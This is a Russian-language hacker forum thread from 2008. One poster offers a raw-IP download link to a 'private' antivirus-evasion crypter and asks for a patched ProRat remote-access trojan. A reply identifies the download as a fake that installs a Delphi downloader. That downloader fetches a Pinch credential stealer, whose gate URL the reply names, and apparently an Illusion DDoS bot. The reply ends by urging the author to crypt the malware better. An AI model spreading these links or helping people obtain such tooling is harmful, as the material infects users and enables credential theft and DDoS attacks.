Ребят вот отрыл приватный FriCryptor Polymorph.... Не знаю фэйк или нет. Пропустил через антипинч - вроде не ругался... Так что проверяем...
http://81.176.70.59/download?id=1680650
P.S> Ктонить может выложить ProRat 1.9 SE? (желательно патченый под дллки) или с Возможностью оного...
Я пробовал и простой SE (мож не тот?) и FX18.. После патча DLLки всёравно лезут((
Последний раз редактировалось JayKa; 08.03.2008 в 08:40..
Это фейк выбрасывающий на выходе вероятно настроенный пинч или какойто даунлоадер.
Вроде в этой теме данную фигню уже выкладывали?
Вот резулт проверки того что выкинул этот фейк при якобы крипте:
http://www.virustotal.com/ru/analisis/5dcca488af513146951710d8436b8395
http://81.176.70.59/download?id=1680650
||
||
\/
Downloader.Delphi.xxx
(Лоадер лоадит 5 файлов при помощи гавно технологии BITss и кривых рук загружает на камп ламоюзера файлы из папки /file/ все пять штук /file/file1..5.exe
||
||
\/
file1.exe - Win32.Pinch -> Тут гейт: www.sypercasino.com/peng/install.php
file2.exe - http://www.virustotal.com/analisis/e3bea74e1a7b17f3689617f540d6aec4 кажеться (Иллюжон ддос бот).
file3.exe - Not found(404)
file4.exe - Not found(404)
file5.exe - Not found(404)
Автору стоит позаботиться о нормальной криптовке его зверушек